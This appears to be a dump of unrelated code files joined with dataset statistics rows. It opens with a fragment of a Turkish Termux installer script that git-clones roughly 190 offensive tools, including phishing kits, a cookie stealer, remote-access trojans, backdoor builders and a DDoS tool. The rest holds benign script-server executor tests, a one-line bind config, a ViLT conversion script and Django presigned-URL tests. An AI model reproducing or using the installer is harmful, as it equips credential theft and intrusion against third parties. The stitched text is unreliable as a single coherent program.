os.system("git clone https://github.com/k4m4/kickthemout.git")
os.system("git clone https://github.com/k4m4/onioff.git")
os.system("git clone https://github.com/kamorin/DHCPig.git")
os.system("git clone https://github.com/karulis/pybluez.git")
os.system("git clone https://github.com/KeepWannabe/Remot3d.git")
os.system("git clone https://github.com/kgretzky/evilginx2.git")
os.system("git clone https://github.com/kuburan/txtool.git")
os.system("git clone https://github.com/LandGrey/pydictor.git")
os.system("git clone https://github.com/lanmaster53/recon-ng.git")
os.system("git clone https://github.com/laramies/theHarvester.git")
os.system("git clone https://github.com/larsbrinkhoff/httptunnel.git")
os.system("git clone https://github.com/leapsecurity/InSpy.git")
os.system("git clone https://github.com/lgandx/Responder.git")
os.system("git clone https://github.com/lightos/credmap.git")
os.system("git clone https://github.com/linkedin/qark.git")
os.system("git clone https://github.com/LionSec/wifresti.git")
os.system("git clone https://github.com/LionSec/xerosploit.git")
os.system("git clone https://github.com/LOoLzeC/Evil-create-framework.git")
os.system("git clone https://github.com/LOoLzeC/SH33LL.git")
os.system("git clone https://github.com/m4ll0k/Infoga.git")
os.system("git clone https://github.com/m4rktn/zeroeye.git")
os.system("git clone https://github.com/m8r0wn/subscraper.git")
os.system("git clone https://github.com/maldevel/IPGeoLocation.git")
os.system("git clone https://github.com/Manisso/Crips.git")
os.system("git clone https://github.com/Manisso/Xshell.git")
os.system("git clone https://github.com/Manisso/fsociety.git")
os.system("git clone https://github.com/mitmproxy/mitmproxy.git")
os.system("git clone https://github.com/mnp/xspy.git")
os.system("git clone https://github.com/Moham3dRiahi/Th3inspector.git")
os.system("git clone https://github.com/Moham3dRiahi/XAttacker.git")
os.system("git clone https://github.com/moxie0/sslstrip.git")
os.system("git clone https://github.com/moyix/creddump.git")
os.system("git clone https://github.com/Mr-Un1k0d3r/DKMC.git")
os.system("git clone https://github.com/Hendriyawan/FBUPv2.0.git")
os.system("git clone https://github.com/MrSqar-Ye/BadMod.git")
os.system("git clone https://github.com/mschwager/fierce.git")
os.system("git clone https://github.com/mteg/braa.git")
os.system("git clone https://github.com/nathanlopez/Stitch.git")
os.system("git clone https://github.com/nccgroup/demiguise.git")
os.system("git clone https://github.com/nccgroup/Winpayloads.git")
os.system("git clone https://github.com/Neo-Oli/termux-ubuntu.git")
os.system("git clone https://github.com/Neohapsis/bbqsql.git")
os.system("git clone https://github.com/neoneggplant/EggShell.git")
os.system("git clone https://github.com/nfc-tools/mfcuk.git")
os.system("git clone https://github.com/nfc-tools/mfoc.git")
os.system("git clone https://github.com/nmilosev/termux-fedora.git")
os.system("git clone https://github.com/NullArray/AutoSploit.git")
os.system("git clone https://github.com/nxxxu/AutoPixieWps.git")
os.system("git clone https://github.com/offensive-security/exploitdb.git")
os.system("git clone https://github.com/OJ/gobuster.git")
os.system("git clone https://github.com/orgcandman/Simple-Fuzzer.git")
os.system("git clone https://github.com/OWASP/OWASP-WebScarab.git")
os.system("git clone https://github.com/OWASP/QRLJacking.git")
os.system("git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git")
os.system("git clone https://github.com/p4kl0nc4t/Spammer-Grab.git")
os.system("git clone https://github.com/pasahitz/zirikatu.git")
os.system("git clone https://github.com/peterpt/eternal_scanner.git")
os.system("git clone https://github.com/peterpt/get.git")
os.system("git clone https://github.com/portcullislabs/enum4linux.git")
os.system("git clone https://github.com/PowerScript/KatanaFramework.git")
os.system("git clone https://github.com/PowerShellMafia/PowerSploit.git")
os.system("git clone https://github.com/qunxyz/proxystrike.git")
os.system("git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git")
os.system("git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git")
os.system("git clone https://github.com/r00t-3xp10it/morpheus.git")
os.system("git clone https://github.com/r00t-3xp10it/trojanizer.git")
os.system("git clone https://github.com/r00tmars/ExploitOnCLI.git")
os.system("git clone https://github.com/r00tmars/XPL-SEARCH.git")
os.system("git clone https://github.com/Rajkumrdusad/MyServer.git")
os.system("git clone https://github.com/Rajkumrdusad/Tool-X.git")
os.system("git clone https://github.com/rand0m1ze/ezsploit.git")
os.system("git clone https://github.com/ReFirmLabs/binwalk.git")
os.system("git clone https://github.com/threat9/routersploit.git")
os.system("git clone https://github.com/reyammer/shellnoob.git")
os.system("git clone https://github.com/rezasp/joomscan.git")
os.system("git clone https://github.com/Rhi7/shell-scan.git")
os.system("git clone https://github.com/ring0lab/catphish.git")
os.system("git clone https://github.com/riverloopsec/killerbee.git")
os.system("git clone https://github.com/robertdavidgraham/masscan.git")
os.system("git clone https://github.com/robertswiecki/intrace.git")
os.system("git clone https://github.com/ron190/jsql-injection.git")
os.system("git clone https://github.com/royhills/arp-scan.git")
os.system("git clone https://github.com/s0lst1c3/eaphammer.git")
os.system("git clone https://github.com/ruped24/killchain.git")
os.system("git clone https://github.com/s0lst1c3/eaphammer.git")
os.system("git clone https://github.com/s0md3v/Blazy.git")
os.system("git clone https://github.com/s0md3v/Hash-Buster.git")
os.system("git clone https://github.com/s0md3v/sqlmate.git")
os.system("git clone https://github.com/s0md3v/Striker.git")
os.system("git clone https://github.com/s0md3v/XSStrike.git")
os.system("git clone https://github.com/sabri-zaki/EasY_HaCk.git")
os.system("git clone https://github.com/samratashok/nishang.git")
os.system("git clone https://github.com/samyk/pwnat.git")
os.system("git clone https://github.com/sandalpenyok/kojawafft.git")
os.system("git clone https://github.com/Sanix-Darker/DDosy.git")
os.system("git clone https://github.com/savio-code/fern-wifi-cracker.git")
os.system("git clone https://github.com/savio-code/ghost-phisher.git")
os.system("git clone https://github.com/Screetsec/Brutal.git")
os.system("git clone https://github.com/Screetsec/Dracnmap.git")
os.system("git clone https://github.com/Screetsec/LALIN.git")
os.system("git clone https://github.com/Screetsec/TheFatRat.git")
os.system("git clone https://github.com/Screetsec/Vegile.git")
os.system("git clone https://github.com/secretsquirrel/the-backdoor-factory.git")
os.system("git clone https://github.com/securestate/termineter.git")
os.system("git clone https://github.com/sensepost/kwetza.git")
os.system("git clone https://github.com/shawarkhanethicalhacker/D-TECT-1.git")
os.system("git clone https://github.com/ShawnDEvans/smbmap.git")
os.system("git clone https://github.com/shekyan/slowhttptest.git")
os.system("git clone https://github.com/shinnok/johnny.git")
os.system("git clone https://github.com/SilentGhostX/HT-WPS-Breaker.git")
os.system("git clone https://github.com/SilverFoxx/PwnSTAR.git")
os.system("git clone https://github.com/silverhat007/termux-wordpresscan.git")
os.system("git clone https://github.com/simsong/bulk_extractor.git")
os.system("git clone https://github.com/siruidops/uidsploit.git")
os.system("git clone https://github.com/Smaash/fuckshitup.git")
os.system("git clone https://github.com/Smaash/snitch.git")
os.system("git clone https://github.com/Souhardya/Zerodoor.git")
os.system("git clone https://github.com/SpiderLabs/deblaze.git")
os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git")
os.system("git clone https://github.com/sqlmapproject/sqlmap.git")
os.system("git clone https://github.com/st42/termux-sudo.git")
os.system("git clone https://github.com/stamparm/DSSS.git")
os.system("git clone https://github.com/stamparm/DSVW.git")
os.system("git clone https://github.com/stamparm/DSXS.git")
os.system("git clone https://github.com/steve-m/kalibrate-rtl.git")
os.system("git clone https://github.com/StreetSec/Gloom-Framework.git")
os.system("git clone https://github.com/sullo/nikto.git")
os.system("git clone https://github.com/SusmithKrishnan/cpscan.git")
os.system("git clone https://github.com/SusmithKrishnan/torghost.git")
os.system("git clone https://github.com/swisskyrepo/Wordpresscan.git")
os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
os.system("git clone https://github.com/utkusen/leviathan.git")
os.system("git clone https://github.com/The404Hacking/websploit.git")
os.system("git clone https://github.com/thehackingsage/hacktronian.git")
os.system("git clone https://github.com/ThoughtfulDev/EagleEye.git")
os.system("git clone https://github.com/tiagorlampert/CHAOS.git")
os.system("git clone https://github.com/tiagorlampert/sAINT.git")
os.system("git clone https://github.com/tomac/yersinia.git")
os.system("git clone https://github.com/trustedsec/ridenum.git")
os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git")
os.system("git clone https://github.com/Tuhinshubhra/CMSeeK.git")
os.system("git clone https://github.com/Tuhinshubhra/fbvid.git")
os.system("git clone https://github.com/Tuhinshubhra/RED_HAWK.git")
os.system("git clone https://github.com/Tuhinshubhra/shellstack.git")
os.system("git clone https://github.com/Cyb0r9/Androspy.git")
os.system("git clone https://github.com/Cyb0r9/SocialBox.git")
os.system("git clone https://github.com/twelvesec/gasmask.git")
os.system("git clone https://github.com/s0md3v/Breacher.git")
os.system("git clone https://github.com/s0md3v/Hash-Buster.git")
os.system("git clone https://github.com/s0md3v/ReconDog.git")
os.system("git clone https://github.com/s0md3v/sqlmate.git")
os.system("git clone https://github.com/s0md3v/Striker.git")
os.system("git clone https://github.com/s0md3v/XSStrike.git")
os.system("git clone https://github.com/UndeadSec/EvilURL.git")
os.system("git clone https://github.com/UndeadSec/GoblinWordGenerator.git")
os.system("git clone https://github.com/UndeadSec/SocialFish.git")
os.system("git clone https://github.com/urbanadventurer/bing-ip2hosts.git")
os.system("git clone https://github.com/urbanadventurer/WhatWeb.git")
os.system("git clone https://github.com/ustayready/CredSniper.git")
os.system("git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git")
os.system("git clone https://github.com/vanhauser-thc/thc-ipv6.git")
os.system("git clone https://github.com/vecna/sniffjoke.git")
os.system("git clone https://github.com/verluchie/termux-lazysqlmap.git")
os.system("git clone https://github.com/volatilityfoundation/volatility.git")
os.system("git clone https://github.com/Wh1t3Rh1n0/air-hammer.git")
os.system("git clone https://github.com/wifiphisher/wifiphisher.git")
os.system("git clone https://github.com/wiire-a/pixiewps.git")
os.system("git clone https://github.com/WiPi-Hunter/PiDense.git")
os.system("git clone https://github.com/wireghoul/doona.git")
os.system("git clone https://github.com/wireghoul/dotdotpwn.git")
os.system("git clone https://github.com/wpscanteam/wpscan.git")
os.system("git clone https://github.com/x90skysn3k/brutespray.git")
os.system("git clone https://github.com/xHak9x/fbi.git")
os.system("git clone https://github.com/xmendez/wfuzz.git")
os.system("git clone https://github.com/xtr4nge/giskismet.git")
os.system("git clone https://github.com/Xyl2k/Cookie-stealer.git")
os.system("git clone https://github.com/Zapotek/cdpsnarf.git")
os.system("git clone https://github.com/zaproxy/zaproxy.git")
os.system("git clone https://github.com/zerosum0x0/koadic.git")
os.system("git clone https://github.com/zigoo0/webpwn3r.git")
os.system("clear")
elif secim == "2":
os.system("termux-setup-storage")
os.system("pkg install root-repo unstable-repo x11-repo -y")
os.system("apt update -y")
os.system("apt upgrade")
os.system("pkg install git -y")
os.system("pkg install python python2 -y")
os.system("pkg intall python3")
os.system("pkg install pip")
os.system("apt install purge-repo -y")
os.system("pkg install php -y")
os.system("pkg install perl -y")
os.system("pkg install nano -y")
os.system("pkg install vim -y")
os.system("pkg install cat -y")
os.system("pkg install pip2 -y")
os.system("pip install wordlist -y")
os.system("pkg install nmap -y")
os.system("pkg install hydra -y")
os.system("pkg install openssl -y")
os.system("apt install nodejs -y")
os.system("clear")
elif secim == "3":
os.system("clear")
else:
print("Lütfen Doğru Seçim Yapınız!!!")
| 57.306843 | 89 | 0.727851 | 3,900 | 25,960 | 4.828974 | 0.192821 | 0.160994 | 0.206765 | 0.300749 | 0.716986 | 0.704561 | 0.704561 | 0.704561 | 0.369883 | 0.087134 | 0 | 0.015061 | 0.086903 | 25,960 | 452 | 90 | 57.433628 | 0.779447 | 0.00208 | 0 | 0.061644 | 0 | 0 | 0.77213 | 0.001236 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.002283 | 0.004566 | 0 | 0.004566 | 0.009132 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4ece406fac429f54a4382b91777c09902c24458d | 13,053 | py | Python | src/tests/executor_test.py | burlamix/script-server | 5dce4ac0a4772f93124b09431247743ff539d112 | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | src/tests/executor_test.py | burlamix/script-server | 5dce4ac0a4772f93124b09431247743ff539d112 | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | src/tests/executor_test.py | burlamix/script-server | 5dce4ac0a4772f93124b09431247743ff539d112 | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | import time
import unittest
from execution import executor
from execution.executor import ScriptExecutor
from react.observable import _StoringObserver, read_until_closed
from tests.test_utils import _MockProcessWrapper, create_config_model, create_script_param_config
BUFFER_FLUSH_WAIT_TIME = (executor.TIME_BUFFER_MS * 1.5) / 1000.0
class TestBuildCommandArgs(unittest.TestCase):
def test_no_parameters_no_values(self):
config = create_config_model('config_x')
args_string = executor.build_command_args({}, config)
self.assertEqual(args_string, [])
def test_no_parameters_some_values(self):
config = create_config_model('config_x')
args_string = executor.build_command_args({'p1': 'value', 'p2': 'value'}, config)
self.assertEqual(args_string, [])
def test_one_parameter_no_values(self):
config = create_config_model('config_x', parameters=[create_script_param_config('param1')])
args_string = executor.build_command_args({}, config)
self.assertEqual(args_string, [])
def test_one_parameter_one_value(self):
config = create_config_model('config_x', parameters=[create_script_param_config('p1')])
args_string = executor.build_command_args({'p1': 'value'}, config)
self.assertEqual(args_string, ['value'])
def test_one_parameter_with_param(self):
parameter = create_script_param_config('p1', param='-p1')
config = create_config_model('config_x', parameters=[parameter])
args_string = executor.build_command_args({'p1': 'value'}, config)
self.assertEqual(args_string, ['-p1', 'value'])
def test_one_parameter_flag_no_value(self):
parameter = create_script_param_config('p1', param='--flag', no_value=True)
config = create_config_model('config_x', parameters=[parameter])
args_string = executor.build_command_args({}, config)
self.assertEqual(args_string, [])
def test_one_parameter_flag_false(self):
parameter = create_script_param_config('p1', param='--flag', no_value=True)
config = create_config_model('config_x', parameters=[parameter])
args_string = executor.build_command_args({'p1': False}, config)
self.assertEqual(args_string, [])
def test_one_parameter_flag_true(self):
parameter = create_script_param_config('p1', param='--flag', no_value=True)
config = create_config_model('config_x', parameters=[parameter])
args_string = executor.build_command_args({'p1': True}, config)
self.assertEqual(args_string, ['--flag'])
def test_parameter_constant(self):
parameter = create_script_param_config('p1', constant=True, default='const')
config = create_config_model('config_x', parameters=[parameter])
args_string = executor.build_command_args({'p1': 'value'}, config)
self.assertEqual(args_string, ['const'])
def test_parameter_int(self):
parameter = create_script_param_config('p1', param='-p1', type='int')
config = create_config_model('config_x', parameters=[parameter])
args_string = executor.build_command_args({'p1': 5}, config)
self.assertEqual(args_string, ['-p1', 5])
def test_parameter_multiselect_when_empty_string(self):
parameter = create_script_param_config('p1', param='-p1', type='multiselect')
config = create_config_model('config_x', parameters=[parameter])
args_list = executor.build_command_args({'p1': ''}, config)
self.assertEqual(args_list, [])
def test_parameter_multiselect_when_empty_list(self):
parameter = create_script_param_config('p1', param='-p1', type='multiselect')
config = create_config_model('config_x', parameters=[parameter])
args_list = executor.build_command_args({'p1': []}, config)
self.assertEqual(args_list, [])
def test_parameter_multiselect_when_single_list(self):
parameter = create_script_param_config('p1', param='-p1', type='multiselect')
config = create_config_model('config_x', parameters=[parameter])
args_list = executor.build_command_args({'p1': ['val1']}, config)
self.assertEqual(args_list, ['-p1', 'val1'])
def test_parameter_multiselect_when_single_list_as_multiarg(self):
parameter = create_script_param_config('p1', param='-p1', type='multiselect')
config = create_config_model('config_x', parameters=[parameter])
args_list = executor.build_command_args({'p1': ['val1']}, config)
self.assertEqual(args_list, ['-p1', 'val1'])
def test_parameter_multiselect_when_multiple_list(self):
parameter = create_script_param_config('p1', type='multiselect')
config = create_config_model('config_x', parameters=[parameter])
args_list = executor.build_command_args({'p1': ['val1', 'val2', 'hello world']}, config)
self.assertEqual(args_list, ['val1,val2,hello world'])
def test_parameter_multiselect_when_multiple_list_and_custom_separator(self):
parameter = create_script_param_config('p1', type='multiselect', multiselect_separator='; ')
config = create_config_model('config_x', parameters=[parameter])
args_list = executor.build_command_args({'p1': ['val1', 'val2', 'hello world']}, config)
self.assertEqual(args_list, ['val1; val2; hello world'])
def test_parameter_multiselect_when_multiple_list_as_multiarg(self):
parameter = create_script_param_config('p1', type='multiselect', multiple_arguments=True)
config = create_config_model('config_x', parameters=[parameter])
args_list = executor.build_command_args({'p1': ['val1', 'val2', 'hello world']}, config)
self.assertEqual(args_list, ['val1', 'val2', 'hello world'])
def test_multiple_parameters_sequence(self):
p1 = create_script_param_config('p1', param='-p1')
p2 = create_script_param_config('p2')
p3 = create_script_param_config('p3', param='--p3', no_value=True)
p4 = create_script_param_config('p4', param='-p4')
p5 = create_script_param_config('p5')
config = create_config_model('config_x', parameters=[p1, p2, p3, p4, p5])
args_string = executor.build_command_args({
'p1': 'val1',
'p2': 'val2',
'p3': 'true',
'p5': 'val5'},
config)
self.assertEqual(args_string, ['-p1', 'val1', 'val2', '--p3', 'val5'])
def test_parameter_secure_no_value(self):
parameter = create_script_param_config('p1', param='-p1', secure=True)
config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
executor = ScriptExecutor(config, {})
secure_command = executor.get_secure_command()
self.assertEqual('ls', secure_command)
def test_parameter_secure_some_value(self):
parameter = create_script_param_config('p1', param='-p1', secure=True)
config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
executor = ScriptExecutor(config, {'p1': 'value'})
secure_command = executor.get_secure_command()
self.assertEqual('ls -p1 ******', secure_command)
def test_parameter_secure_value_and_same_unsecure(self):
p1 = create_script_param_config('p1', param='-p1', secure=True)
p2 = create_script_param_config('p2', param='-p2')
config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[p1, p2])
executor = ScriptExecutor(config, {'p1': 'value', 'p2': 'value'})
secure_command = executor.get_secure_command()
self.assertEqual('ls -p1 ****** -p2 value', secure_command)
def test_parameter_secure_multiselect(self):
parameter = create_script_param_config('p1', param='-p1', secure=True, type='multiselect')
config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
executor = ScriptExecutor(config, {'p1': ['one', 'two', 'three']})
secure_command = executor.get_secure_command()
self.assertEqual('ls -p1 ******,******,******', secure_command)
def test_parameter_secure_multiselect_as_multiarg(self):
parameter = create_script_param_config(
'p1', param='-p1', secure=True, type='multiselect', multiple_arguments=True)
config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
executor = ScriptExecutor(config, {'p1': ['one', 'two', 'three']})
secure_command = executor.get_secure_command()
self.assertEqual('ls -p1 ****** ****** ******', secure_command)
class TestProcessOutput(unittest.TestCase):
def test_log_raw_single_line(self):
config = self._create_config()
self.create_and_start_executor(config)
observer = _StoringObserver()
self.executor.get_raw_output_stream().subscribe(observer)
self.write_process_output('some text')
wait_buffer_flush()
self.assertEqual(['some text'], observer.data)
def test_log_raw_single_buffer(self):
config = self._create_config()
self.create_and_start_executor(config)
observer = _StoringObserver()
self.executor.get_raw_output_stream().subscribe(observer)
self.write_process_output('some text')
self.write_process_output(' and continuation')
wait_buffer_flush()
self.assertEqual(['some text and continuation'], observer.data)
def test_log_raw_multiple_buffers(self):
config = self._create_config()
self.create_and_start_executor(config)
observer = _StoringObserver()
self.executor.get_raw_output_stream().subscribe(observer)
self.write_process_output('some text')
wait_buffer_flush()
self.write_process_output(' and continuation')
wait_buffer_flush()
self.assertEqual(['some text', ' and continuation'], observer.data)
def test_log_with_secure(self):
parameter = create_script_param_config('p1', secure=True)
config = self._create_config(parameters=[parameter])
self.create_and_start_executor(config, {'p1': 'a'})
self.write_process_output('a| some text')
self.write_process_output('\nand a new line')
self.write_process_output(' with some long long text |a')
self.finish_process()
output = self.get_finish_output()
self.assertEqual(output, '******| some text\nand ****** new line with some long long text |******')
def test_log_with_secure_ignore_whitespaces(self):
parameter = create_script_param_config('p1', secure=True)
config = self._create_config(parameters=[parameter])
self.create_and_start_executor(config, {'p1': ' '})
self.write_process_output('some text')
self.write_process_output('\nand a new line')
self.write_process_output(' with some long long text')
self.finish_process()
output = self.get_finish_output()
self.assertEqual(output, 'some text\nand a new line with some long long text')
def test_log_with_secure_when_multiselect(self):
parameter = create_script_param_config('p1', secure=True, type='multiselect')
config = self._create_config(parameters=[parameter])
self.create_and_start_executor(config, {'p1': ['123', 'password']})
self.write_process_output('some text(123)')
self.write_process_output('\nand a new line')
self.write_process_output(' with my password')
self.finish_process()
output = self.get_finish_output()
self.assertEqual(output, 'some text(******)\nand a new line with my ******')
@staticmethod
def _create_config(parameters=None):
return create_config_model('config_x', config={'script_path': 'ls'}, parameters=parameters)
def setUp(self):
self.config = create_config_model('config_x')
self.config.script_command = 'ls'
executor._process_creator = _MockProcessWrapper
super().setUp()
def tearDown(self):
super().tearDown()
self.finish_process()
self.executor.cleanup()
def write_process_output(self, text):
wrapper = self.executor.process_wrapper
wrapper._write_script_output(text)
# noinspection PyUnresolvedReferences
def finish_process(self):
self.executor.process_wrapper.kill()
def get_finish_output(self):
data = read_until_closed(self.executor.get_anonymized_output_stream(), timeout=BUFFER_FLUSH_WAIT_TIME)
output = ''.join(data)
return output
def create_and_start_executor(self, config, parameter_values=None):
if parameter_values is None:
parameter_values = {}
self.executor = ScriptExecutor(config, parameter_values)
self.executor.start()
return self.executor
def wait_buffer_flush():
time.sleep(BUFFER_FLUSH_WAIT_TIME)
| 38.278592 | 110 | 0.681299 | 1,543 | 13,053 | 5.416721 | 0.085548 | 0.04738 | 0.061019 | 0.082556 | 0.805456 | 0.786911 | 0.75341 | 0.725532 | 0.721584 | 0.675879 | 0 | 0.012564 | 0.188999 | 13,053 | 340 | 111 | 38.391176 | 0.77697 | 0.002681 | 0 | 0.414414 | 0 | 0 | 0.107176 | 0 | 0 | 0 | 0 | 0 | 0.130631 | 1 | 0.166667 | false | 0.009009 | 0.027027 | 0.004505 | 0.216216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
09042834307ba33bcd1e7acb97f0929a58ee3cd8 | 22 | py | Python | tcpconf.py | dincamihai/nspawn-api | f6ddce0939cf5759134071462d81ad3d80e68172 | [
"MIT"
] | null | null | null | tcpconf.py | dincamihai/nspawn-api | f6ddce0939cf5759134071462d81ad3d80e68172 | [
"MIT"
] | null | null | null | tcpconf.py | dincamihai/nspawn-api | f6ddce0939cf5759134071462d81ad3d80e68172 | [
"MIT"
] | null | null | null | bind="127.0.0.1:4000"
| 11 | 21 | 0.636364 | 6 | 22 | 2.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.47619 | 0.045455 | 22 | 1 | 22 | 22 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
092e3fc818282ebd45e225e4428e9900fe87b5e7 | 91 | py | Python | image/vilt/utils/makearrow.py | yuxuan-lou/ColossalAI-Examples | 1fcb7b4ff5588c653523f877c8848db0a7c56a60 | [
"Apache-2.0"
] | 39 | 2022-01-18T09:35:17.000Z | 2022-03-30T09:17:35.000Z | image/vilt/utils/makearrow.py | yuxuan-lou/ColossalAI-Examples | 1fcb7b4ff5588c653523f877c8848db0a7c56a60 | [
"Apache-2.0"
] | 26 | 2022-01-20T05:45:23.000Z | 2022-03-30T08:41:39.000Z | image/vilt/utils/makearrow.py | yuxuan-lou/ColossalAI-Examples | 1fcb7b4ff5588c653523f877c8848db0a7c56a60 | [
"Apache-2.0"
] | 31 | 2022-01-18T14:16:29.000Z | 2022-03-30T09:17:39.000Z | from write_coco_karpathy import make_arrow
import sys
make_arrow(sys.argv[1], sys.argv[2]) | 22.75 | 42 | 0.813187 | 17 | 91 | 4.117647 | 0.647059 | 0.257143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024096 | 0.087912 | 91 | 4 | 43 | 22.75 | 0.819277 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
09369c5d835b639cbb54cfbc1a485babb5df3e73 | 5,353 | py | Python | lab/documents/tests/test_api_views.py | lajarre/euphrosyne | 14050097774b088e7345f9488ce74b205f7bd338 | [
"MIT"
] | 1 | 2022-03-09T19:47:29.000Z | 2022-03-09T19:47:29.000Z | lab/documents/tests/test_api_views.py | lajarre/euphrosyne | 14050097774b088e7345f9488ce74b205f7bd338 | [
"MIT"
] | null | null | null | lab/documents/tests/test_api_views.py | lajarre/euphrosyne | 14050097774b088e7345f9488ce74b205f7bd338 | [
"MIT"
] | null | null | null | from unittest.mock import MagicMock, patch
from django.http.response import JsonResponse
from django.test import RequestFactory
from django.urls import reverse
from ...documents.api_views import (
presigned_document_delete_url_view,
presigned_document_download_url_view,
presigned_document_list_url_view,
presigned_document_upload_url_view,
)
from ...tests.factories import LabAdminUserFactory
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_upload_post",
MagicMock(return_value=""),
)
def test_presigned_document_upload_url_successful_response():
request = RequestFactory().post(
reverse("api:presigned_document_upload_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_upload_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_list_url",
MagicMock(return_value=""),
)
def test_presigned_document_list_url_successful_response():
request = RequestFactory().post(
reverse("api:presigned_document_list_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_list_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_download_url",
MagicMock(return_value=""),
)
def test_presigned_presigned_document_download_url_successful_response():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_download_url", args=[1]), 1
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_download_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_download_url",
MagicMock(return_value=""),
)
def test_presigned_presigned_document_download_url_no_key_sends_bad_requests():
request = RequestFactory().post(
reverse("api:presigned_document_download_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_download_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_download_url",
MagicMock(return_value=""),
)
def test_presigned_presigned_document_download_url_wrong_key_sends_bad_requests():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_download_url", args=[1]), 2
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_download_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_delete_url",
MagicMock(return_value=""),
)
def test_presigned_document_delete_url_successful_response():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_delete_url", args=[1]), 1
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_delete_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_delete_url",
MagicMock(return_value=""),
)
def test_presigned_document_delete_url_no_key_sends_bad_requests():
request = RequestFactory().post(
reverse("api:presigned_document_delete_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_delete_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_delete_url",
MagicMock(return_value=""),
)
def test_presigned_document_delete_url_wrong_key_sends_bad_requests():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_delete_url", args=[1]), 2
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_delete_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content
